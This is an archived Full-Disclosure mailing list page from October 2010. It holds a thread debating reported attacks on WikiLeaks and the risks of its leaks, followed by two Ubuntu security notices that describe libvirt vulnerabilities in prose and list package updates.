 Yet again I would like to pint out that there seems to be a concerted
 high power attack going on against WL
 And yet again I would like to point out it would be interesting to know
 what is rally happening.
 And yet again I'd like to emphasize that this indeed a security issue;
 it does concern netizens and citizens in general if major government
 organisations engage in what seems to be a dirty war against a
 whistleblowing organisation.

 If anybody knows more, pls. do share insights...

 Harry


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 

Cal Leeming

Operational Security  Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564




-- 

Cal Leeming

Operational Security  Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Jeffrey Walton
Hi Cal,

 I can appreciate his previous efforts, but what he has done here is put many
 lifes at risk, both civilians and soldiers.
Agreed.

Just to play devils advocate:
Would Barrack Obama also be culpable? His campaign platform included a
withdrawl from Iraq (Afghanistan was a different story). So troops are
still there because he [apparently] lied to [fraudulently] obtain the
office.

If the troops weren't there, then the troops would not be at risk, and
there would be no wiki leaks story. quod erat demonstrandum.

Jeffrey Walton
Baltimore, MD, US

On Thu, Oct 21, 2010 at 12:51 PM, Cal Leeming [Simplicity Media Ltd]
cal.leem...@simplicitymedialtd.co.uk wrote:
 This will be my first and last post on this topic (again).
 I've just finished watching some videos about what wikileaks have been
 doing.
 It appears that they released a bunch of documents that revealed information
 such as GPS co-ords + details of those who co-op'd with soldiers. He also
 posted the names of these people too, and a bunch of information which
 could jeopardise the protection of soldiers on the ground, from all
 countries.
 I can appreciate his previous efforts, but what he has done here is put many
 lifes at risk, both civilians and soldiers.
 So, if the US military have launched an all our war on Wikileaks, whether it
 be legal or not, I can't say it would be entirely shocking.
 On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote:

 Sorry to all of those who think this is gossiping, but:

 Wikileaks has been down for ca. 2 weeks now during which time the US has
 at least cut off their financial channels.
 This during a period where WL has announced another major leak release
 this time re. Iraq.
 What is also extremely disconcerting is the absolute silence of _all_
 main street media to the topic (gag...?)

 Now the latest tweet reads:
 WikiLeaks communications infrastructure is currently under attack.
 Project BO move to coms channel S. Activate Reston5.

 Yet again I would like to pint out that there seems to be a concerted
 high power attack going on against WL
 And yet again I would like to point out it would be interesting to know
 what is rally happening.
 And yet again I'd like to emphasize that this indeed a security issue;
 it does concern netizens and citizens in general if major government
 organisations engage in what seems to be a dirty war against a
 whistleblowing organisation.

 If anybody knows more, pls. do share insights...

     Harry


 --

 Cal Leeming

 Operational Security  Support Team

 Out of Hours: +44 (07534) 971120 | Support
 Tickets: supp...@simplicitymedialtd.co.uk
 Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk
 IM: AIM / ICQ / MSN / Skype (available upon request)

 Simplicity Media Ltd. All rights reserved.
 Registered company number 7143564



 --

 Cal Leeming

 Operational Security  Support Team

 [SNIP]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Thor (Hammer of God)
Hey Cal - hope all is well...

Along those lines, I think it is also interesting to take into account how much 
similar information is being distributed by military personnel themselves on 
social sites like Facebook.  Thomas Ryan did an interesting Blackhat 
presentation on Robin Sage where a fake account was friended by multiple 
military people, who in turn were posting iPhone and other geo-tagged images on 
facebook where their location was tagged and the associated names of others 
were available (I didn't actually get to attend, but I had prior knowledge of 
the content).

So while this type of stuff is great Conspiracy Theory fodder, I seriously 
doubt that there is some illegal military operation behind the attacks on 
Wikileaks.  If they had any additional information they wished to share, there 
are a million other ways of getting the data out there - we'd be seeing that 
stuff on Twitter instead of tech updates.  I think we'd also be seeing Facebook 
takedowns as well...

T

P.S.  I think I'm going to set up a social network for hookers and call it 
Twatter if anyone is interesting in investing.



From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Cal Leeming 
[Simplicity Media Ltd]
Sent: Thursday, October 21, 2010 9:51 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] wikileaks still under attack, pressure revved up

This will be my first and last post on this topic (again).

I've just finished watching some videos about what wikileaks have been doing.

It appears that they released a bunch of documents that revealed information 
such as GPS co-ords + details of those who co-op'd with soldiers. He also 
posted the names of these people too, and a bunch of information which could 
jeopardise the protection of soldiers on the ground, from all countries.

I can appreciate his previous efforts, but what he has done here is put many 
lifes at risk, both civilians and soldiers.

So, if the US military have launched an all our war on Wikileaks, whether it be 
legal or not, I can't say it would be entirely shocking.

On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens 
ha...@behrens.commailto:ha...@behrens.com wrote:
Sorry to all of those who think this is gossiping, but:

Wikileaks has been down for ca. 2 weeks now during which time the US has
at least cut off their financial channels.
This during a period where WL has announced another major leak release
this time re. Iraq.
What is also extremely disconcerting is the absolute silence of _all_
main street media to the topic (gag...?)

Now the latest tweet reads:
WikiLeaks communications infrastructure is currently under attack.
Project BO move to coms channel S. Activate Reston5.

Yet again I would like to pint out that there seems to be a concerted
high power attack going on against WL
And yet again I would like to point out it would be interesting to know
what is rally happening.
And yet again I'd like to emphasize that this indeed a security issue;
it does concern netizens and citizens in general if major government
organisations engage in what seems to be a dirty war against a
whistleblowing organisation.

If anybody knows more, pls. do share insights...

Harry


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--

Cal Leeming

Operational Security  Support Team

Out of Hours: +44 (07534) 971120 | Support Tickets: 
supp...@simplicitymedialtd.co.ukmailto:supp...@simplicitymedialtd.co.uk
Fax: +44 (02476) 578987 | Email: 
cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk
IM: AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564




--

Cal Leeming

Operational Security  Support Team

Out of Hours: +44 (07534) 971120 | Support Tickets: 
supp...@simplicitymedialtd.co.ukmailto:supp...@simplicitymedialtd.co.uk
Fax: +44 (02476) 578987 | Email: 
cal.leem...@simplicitymedialtd.co.ukmailto:cal.leem...@simplicitymedialtd.co.uk
IM: AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Harry Behrens
Am 21.10.2010 18:54, schrieb T Biehn:
 An entity that has the resources that would provoke such a hollywood 
 esque tweet wouldn't have the ability to gag the twitter account 
 before this release?

would it, would it want to, has it missed it..who knows?

 Wouldn't that mean the tweet is a load of shit?


Wouldn't/shouldn't/couldn't...I just don't know.
Point is I'm trying to find out what's actually happening...

 -h

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Roger
I believe that most of the times it is not what you defend but how you
defend it.
I believe in Government transparency but the way WL is going about it
it's not right, in my honest opinion.
So this is good news in my opinion...

-r

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Ana Kismet
I have seen nothing released that reveals sensitive information such as GPS
co-ords + details of those who co-op'd with soldiers.

This is a rumor. If you have proof that this is not a rumor, please post it.




On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd] 
cal.leem...@simplicitymedialtd.co.uk wrote:

 This will be my first and last post on this topic (again).

 I've just finished watching some videos about what wikileaks have been
 doing.

 It appears that they released a bunch of documents that revealed
 information such as GPS co-ords + details of those who co-op'd with
 soldiers. He also posted the names of these people too, and a bunch of
 information which could jeopardise the protection of soldiers on the ground,
 from all countries.

 I can appreciate his previous efforts, but what he has done here is put
 many lifes at risk, both civilians and soldiers.

 So, if the US military have launched an all our war on Wikileaks, whether
 it be legal or not, I can't say it would be entirely shocking.

  On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote:

 Sorry to all of those who think this is gossiping, but:

 Wikileaks has been down for ca. 2 weeks now during which time the US has
 at least cut off their financial channels.
 This during a period where WL has announced another major leak release
 this time re. Iraq.
 What is also extremely disconcerting is the absolute silence of _all_
 main street media to the topic (gag...?)

 Now the latest tweet reads:
 WikiLeaks communications infrastructure is currently under attack.
 Project BO move to coms channel S. Activate Reston5.

 Yet again I would like to pint out that there seems to be a concerted
 high power attack going on against WL
 And yet again I would like to point out it would be interesting to know
 what is rally happening.
 And yet again I'd like to emphasize that this indeed a security issue;
 it does concern netizens and citizens in general if major government
 organisations engage in what seems to be a dirty war against a
 whistleblowing organisation.

 If anybody knows more, pls. do share insights...

 Harry


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




 --

 Cal Leeming

 Operational Security  Support Team

 *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
 supp...@simplicitymedialtd.co.uk
 *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
 *IM: *AIM / ICQ / MSN / Skype (available upon request)
 Simplicity Media Ltd. All rights reserved.
 Registered company number 7143564




 --

 Cal Leeming

 Operational Security  Support Team

 *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
 supp...@simplicitymedialtd.co.uk
 *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
 *IM: *AIM / ICQ / MSN / Skype (available upon request)
 Simplicity Media Ltd. All rights reserved.
 Registered company number 7143564


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Camden Buzard




According to the secretary of defense, it's definitely a rumor:

A letter from Secretary of Defense Robert M. Gates to
Comittee of Armed Services Chairman Carl Levin dated August 16 but
recently made available to the public says, The initial assessment in
no way discounts the risk to national security; however, the review to
date has not revealed any sensitive intelligence sources and methods
compromised by this disclosure.

http://mashable.com/2010/10/18/wikileaks-dod-intelligence/
direct pdf link:
http://www.fas.org/sgp/othergov/dod/gates-wikileaks.pdf

--Camden

On 10/21/2010 11:49 AM, Ana Kismet wrote:

  
  I have seen nothing released that reveals sensitive information
such as "GPS co-ords + details of those who co-op'd with soldiers."
  
  This is a rumor. If you have proof that this is not a rumor,
please post it. 
  
  

  On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media
Ltd] cal.leem...@simplicitymedialtd.co.uk
wrote:
  
This will be my first and last post on this topic (again).


I've just finished watching some videos about what wikileaks
have been doing.


It appears that they released a bunch of documents that
revealed information such as GPS co-ords + details of those who co-op'd
with soldiers. He also posted the names of these people too, and a
bunch of information which couldjeopardisethe protection of soldiers
on the ground, from all countries.


I can appreciate his previous efforts, but what he has done
here is put many lifes at risk, both civilians and soldiers.


So, if the US military have launched an all our war on
Wikileaks, whether it be legal or not, I can't say it would be entirely
shocking.








On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com
wrote:
Sorry to all of those who think this is "gossiping",
but:
  
Wikileaks has been down for ca. 2 weeks now during which time the US has
at least cut off their financial channels.
This during a period where WL has announced another major leak release
this time re. Iraq.
What is also extremely disconcerting is the absolute silence of _all_
main street media to the topic (gag...?)
  
Now the latest tweet reads:
"WikiLeaks communications infrastructure is currently under attack.
Project BO move to coms channel S. Activate Reston5."
  
Yet again I would like to pint out that there seems to be a concerted
high power attack going on against WL
And yet again I would like to point out it would be interesting to know
what is rally happening.
And yet again I'd like to emphasize that this indeed a security issue;
it does concern netizens and citizens in general if major government
organisations engage in what seems to be a dirty war against a
whistleblowing organisation.
  
If anybody knows more, pls. do share insights...
  
  Harry
  
  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/









-- 
Cal Leeming
Operational Security  Support Team

Out of Hours:+44 (07534) 971120 |Support Tickets:supp...@simplicitymedialtd.co.uk
Fax:+44 (02476) 578987|Email:cal.leem...@simplicitymedialtd.co.uk
IM:AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.

Registered company number7143564







-- 
Cal Leeming
Operational Security  Support Team

Out of Hours:+44 (07534) 971120 |Support Tickets:supp...@simplicitymedialtd.co.uk
Fax:+44 (02476) 578987|Email:cal.leem...@simplicitymedialtd.co.uk
IM:AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.

Registered company number7143564


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
  
  
  
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Cal Leeming [Simplicity Media Ltd]
I apologise for this, I had heard this in, what I had believed to be, a
credible news report.

On Thu, Oct 21, 2010 at 8:58 PM, Camden Buzard camde...@aptalaska.netwrote:

  According to the secretary of defense, it's definitely a rumor:

 A letter from Secretary of Defense Robert M. Gates to Comittee of Armed
 Services Chairman Carl Levin dated August 16 but recently made available to
 the public says, “The initial assessment in no way discounts the risk to
 national security; however, the review to date has not revealed any
 sensitive intelligence sources and methods compromised by this disclosure.”

 http://mashable.com/2010/10/18/wikileaks-dod-intelligence/
 direct pdf link:
 http://www.fas.org/sgp/othergov/dod/gates-wikileaks.pdf

 --Camden


 On 10/21/2010 11:49 AM, Ana Kismet wrote:

 I have seen nothing released that reveals sensitive information such as
 GPS co-ords + details of those who co-op'd with soldiers.

 This is a rumor. If you have proof that this is not a rumor, please post
 it.



 On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd] 
 cal.leem...@simplicitymedialtd.co.uk wrote:

 This will be my first and last post on this topic (again).

  I've just finished watching some videos about what wikileaks have been
 doing.

  It appears that they released a bunch of documents that revealed
 information such as GPS co-ords + details of those who co-op'd with
 soldiers. He also posted the names of these people too, and a bunch of
 information which could jeopardise the protection of soldiers on the ground,
 from all countries.

  I can appreciate his previous efforts, but what he has done here is put
 many lifes at risk, both civilians and soldiers.

  So, if the US military have launched an all our war on Wikileaks, whether
 it be legal or not, I can't say it would be entirely shocking.

  On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote:

 Sorry to all of those who think this is gossiping, but:

 Wikileaks has been down for ca. 2 weeks now during which time the US has
 at least cut off their financial channels.
 This during a period where WL has announced another major leak release
 this time re. Iraq.
 What is also extremely disconcerting is the absolute silence of _all_
 main street media to the topic (gag...?)

 Now the latest tweet reads:
 WikiLeaks communications infrastructure is currently under attack.
 Project BO move to coms channel S. Activate Reston5.

 Yet again I would like to pint out that there seems to be a concerted
 high power attack going on against WL
 And yet again I would like to point out it would be interesting to know
 what is rally happening.
 And yet again I'd like to emphasize that this indeed a security issue;
 it does concern netizens and citizens in general if major government
 organisations engage in what seems to be a dirty war against a
 whistleblowing organisation.

 If anybody knows more, pls. do share insights...

 Harry


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




   --

 Cal Leeming

 Operational Security  Support Team

 *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
 supp...@simplicitymedialtd.co.uk
 *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
 *IM: *AIM / ICQ / MSN / Skype (available upon request)
 Simplicity Media Ltd. All rights reserved.
  Registered company number 7143564




 --

 Cal Leeming

 Operational Security  Support Team

 *Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
 supp...@simplicitymedialtd.co.uk
 *Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
 *IM: *AIM / ICQ / MSN / Skype (available upon request)
 Simplicity Media Ltd. All rights reserved.
  Registered company number 7143564


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 

Cal Leeming

Operational Security  Support Team

*Out of Hours: *+44 (07534) 971120 | *Support Tickets: *
supp...@simplicitymedialtd.co.uk
*Fax: *+44 (02476) 578987 | *Email: *cal.leem...@simplicitymedialtd.co.uk
*IM: *AIM / ICQ / MSN / Skype (available upon request)
Simplicity Media Ltd. All rights reserved.
Registered company number 7143564
___
Full-Disclosure - We believe in it.
Charter: 

Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Charles Timko
Agreed. I am all for the transparency, but WL is possibly putting our troops
at risk by releasing military strategy.  I wouldn't expect JA to think that
there is any inclination of strategy in the documents they published, but
there is a lot of strategy and a LOT of information that is now visible to
more than just United States citizens.

-timko

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Roger
Sent: Thursday, October 21, 2010 12:51 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] wikileaks still under attack, pressure revved
up

I believe that most of the times it is not what you defend but how you
defend it.
I believe in Government transparency but the way WL is going about it it's
not right, in my honest opinion.
So this is good news in my opinion...

-r

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread Jonathan Medina
I am in the military, currently in Iraq, and these Wikileaks posts
have hurt us more than people realize. It does two things, first, it
demonstrates our tactics and procedures which allow insurgents to
conduct more effective attacks against us, and second, the information
it provides to insurgents endangers our sources and the families of
sources that have provided us with valuable information. It also
provides a means of giving insurgents propaganda to use against us.
Whether you agree with the war or not, the publication of these
documents hurts people who had no say in the decision to go to war.
Having said that, I absolutely do not support the illegal attacks and
denial of service to the site. Here is a link to a tech news article i
read today on the issue.

http://cybersecurityreport.nextgov.com/2010/10/wikileaks_communications_infrastructure_attacked.php?oref=latest_posts



On Thu, Oct 21, 2010 at 12:49 PM, Ana Kismet anakis...@gmail.com wrote:
 I have seen nothing released that reveals sensitive information such as GPS
 co-ords + details of those who co-op'd with soldiers.

 This is a rumor. If you have proof that this is not a rumor, please post it.


 On Thu, Oct 21, 2010 at 11:51 AM, Cal Leeming [Simplicity Media Ltd]
 cal.leem...@simplicitymedialtd.co.uk wrote:

 This will be my first and last post on this topic (again).
 I've just finished watching some videos about what wikileaks have been
 doing.
 It appears that they released a bunch of documents that revealed
 information such as GPS co-ords + details of those who co-op'd with
 soldiers. He also posted the names of these people too, and a bunch of
 information which could jeopardise the protection of soldiers on the ground,
 from all countries.
 I can appreciate his previous efforts, but what he has done here is put
 many lifes at risk, both civilians and soldiers.
 So, if the US military have launched an all our war on Wikileaks, whether
 it be legal or not, I can't say it would be entirely shocking.
 On Thu, Oct 21, 2010 at 5:32 PM, Harry Behrens ha...@behrens.com wrote:

 Sorry to all of those who think this is gossiping, but:

 Wikileaks has been down for ca. 2 weeks now during which time the US has
 at least cut off their financial channels.
 This during a period where WL has announced another major leak release
 this time re. Iraq.
 What is also extremely disconcerting is the absolute silence of _all_
 main street media to the topic (gag...?)

 Now the latest tweet reads:
 WikiLeaks communications infrastructure is currently under attack.
 Project BO move to coms channel S. Activate Reston5.

 Yet again I would like to pint out that there seems to be a concerted
 high power attack going on against WL
 And yet again I would like to point out it would be interesting to know
 what is rally happening.
 And yet again I'd like to emphasize that this indeed a security issue;
 it does concern netizens and citizens in general if major government
 organisations engage in what seems to be a dirty war against a
 whistleblowing organisation.

 If anybody knows more, pls. do share insights...

     Harry


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



 --

 Cal Leeming

 Operational Security  Support Team

 Out of Hours: +44 (07534) 971120 | Support
 Tickets: supp...@simplicitymedialtd.co.uk
 Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk
 IM: AIM / ICQ / MSN / Skype (available upon request)

 Simplicity Media Ltd. All rights reserved.
 Registered company number 7143564



 --

 Cal Leeming

 Operational Security  Support Team

 Out of Hours: +44 (07534) 971120 | Support
 Tickets: supp...@simplicitymedialtd.co.uk
 Fax: +44 (02476) 578987 | Email: cal.leem...@simplicitymedialtd.co.uk
 IM: AIM / ICQ / MSN / Skype (available upon request)

 Simplicity Media Ltd. All rights reserved.
 Registered company number 7143564

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] wikileaks still under attack, pressure revved up

2010-10-21 Thread BMF
On Thu, Oct 21, 2010 at 11:32 AM, Charles Timko
charles.ti...@hotmail.com wrote:
 Agreed. I am all for the transparency, but WL is possibly putting our troops
 at risk by releasing military strategy.  I wouldn't expect JA to think that

From:

http://articles.cnn.com/2010-10-16/us/wikileaks.assessment_1_julian-assange-wikileaks-documents?_s=PM:US

 The online leak of thousands of secret military documents from
the war in Afghanistan by the website WikiLeaks
 did not disclose any sensitive intelligence sources or methods,
the Department of Defense concluded.

So some are playing it up but the top dude at the Pentagon is playing
it down. Who ya gonna believe? Unless someone can point to a verified
leaked document online which says Mohammed Jihad Dirka Dirka who
lives at lat/long told us Osama is in that house over there or some
such I can't believe such information is being distributed.

BMF

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [USN-1008-1] libvirt vulnerabilities

2010-10-21 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-1008-1   October 21, 2010
libvirt vulnerabilities
CVE-2010-2237, CVE-2010-2238, CVE-2010-2239, CVE-2010-2242
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  libvirt-bin 0.4.0-2ubuntu8.3
  libvirt00.4.0-2ubuntu8.3

Ubuntu 9.04:
  libvirt-bin 0.6.1-0ubuntu5.2
  libvirt00.6.1-0ubuntu5.2

Ubuntu 9.10:
  libvirt-bin 0.7.0-1ubuntu13.2
  libvirt00.7.0-1ubuntu13.2

Ubuntu 10.04 LTS:
  libvirt-bin 0.7.5-5ubuntu27.5
  libvirt00.7.5-5ubuntu27.5

After a standard system update you need to reboot your computer to make
all the necessary changes.

ATTENTION: The previous version of libvirt on Ubuntu 10.04 LTS would probe
a qemu disk to determine its format and did not require that the format be
declared in the XML. This is considered a security problem in most
deployments and this version of libvirt will default to the 'raw' format
when the format is not specified in the XML. As a result, non-raw disks
without a specified disk format will no longer be available in existing
virtual machines.

The libvirt-migrate-qemu-disks tool is provided to aid in transitioning
virtual machine definitions to the new required format. In essence, it will
check all domains for affected virtual machines, probe the affected disks
and update the domain definition accordingly. This command will be run
automatically on upgrade. For new virtual machines using non-raw images,
the disk format must be specified in the domain XML provided to libvirt,
otherwise the disk will not be available to the virtual machine. See man 1
libvirt-migrate-qemu-disks for details.

Users who require the old behavior can adjust the 'allow_disk_format_probing'
option in /etc/libvirt/qemu.conf.

Details follow:

It was discovered that libvirt would probe disk backing stores without
consulting the defined format for the disk. A privileged attacker in the
guest could exploit this to read arbitrary files on the host. This issue
only affected Ubuntu 10.04 LTS. By default, guests are confined by an
AppArmor profile which provided partial protection against this flaw.
(CVE-2010-2237, CVE-2010-2238)

It was discovered that libvirt would create new VMs without setting a
backing store format. A privileged attacker in the guest could exploit this
to read arbitrary files on the host. This issue did not affect Ubuntu 8.04
LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile
which provided partial protection against this flaw. (CVE-2010-2239)

Jeremy Nickurak discovered that libvirt created iptables rules with too
lenient mappings of source ports. A privileged attacker in the guest could
bypass intended restrictions to access privileged resources on the host.
(CVE-2010-2242)


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.3.diff.gz
  Size/MD5:20884 e9ceff27938937bcc8b3c66e34fccf00

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0-2ubuntu8.3.dsc
  Size/MD5: 1081 fd9d6eba4ca530254a86219ada9dc103

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt_0.4.0.orig.tar.gz
  Size/MD5:  2968326 2f6c6adb62145988f0e5021e5cbd71d3

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-doc_0.4.0-2ubuntu8.3_all.deb
  Size/MD5:   316872 e3bfa8be390d762688ae9077ea77b89f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-bin_0.4.0-2ubuntu8.3_amd64.deb
  Size/MD5:88842 91996ea9642d9f43c11af7f178aac401

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-dev_0.4.0-2ubuntu8.3_amd64.deb
  Size/MD5:   224782 0c81c813422856531052934cd2df82d3

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0-dbg_0.4.0-2ubuntu8.3_amd64.deb
  Size/MD5:   551124 0f010dc998ec103b16e13a6ed4d6dca6

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt0_0.4.0-2ubuntu8.3_amd64.deb
  Size/MD5:   181936 c214ad6ba917e19c39a950d4fd119d86

http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/python-libvirt_0.4.0-2ubuntu8.3_amd64.deb
  Size/MD5:26478 b362bda807c5a9b05203f00da3830b0f

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/libv/libvirt/libvirt-bin_0.4.0-2ubuntu8.3_i386.deb
  Size/MD5:87620 

[Full-disclosure] [USN-1008-2] Virtinst update

2010-10-21 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-1008-2   October 21, 2010
virtinst update
https://launchpad.net/bugs/655392
===

A security issue affects the following Ubuntu releases:

Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 10.04 LTS:
  virtinst0.500.1-2ubuntu6.1

In general, a standard system update will make all the necessary changes.

Details follow:

Libvirt in Ubuntu 10.04 LTS now no longer probes qemu disks for the image
format and defaults to 'raw' when the format is not specified in the XML.
This change in behavior breaks virt-install --import because virtinst in
Ubuntu 10.04 LTS did not allow for specifying a disk format and does not
specify a format in the XML. This update adds the 'format=' option when
specifying a disk. For example, to import an existing VM which uses a qcow2
disk format, use somthing like the following:

  virt-install --connect=qemu:///session --name test-import --ram=256 \
--disk path=path to qcow2 image,format=qcow2 --import

For more information, see man 1 virt-install.

Original advisory details:

 It was discovered that libvirt would probe disk backing stores without
 consulting the defined format for the disk. A privileged attacker in the
 guest could exploit this to read arbitrary files on the host. This issue
 only affected Ubuntu 10.04 LTS. By default, guests are confined by an
 AppArmor profile which provided partial protection against this flaw.
 (CVE-2010-2237, CVE-2010-2238)
 
 It was discovered that libvirt would create new VMs without setting a
 backing store format. A privileged attacker in the guest could exploit this
 to read arbitrary files on the host. This issue did not affect Ubuntu 8.04
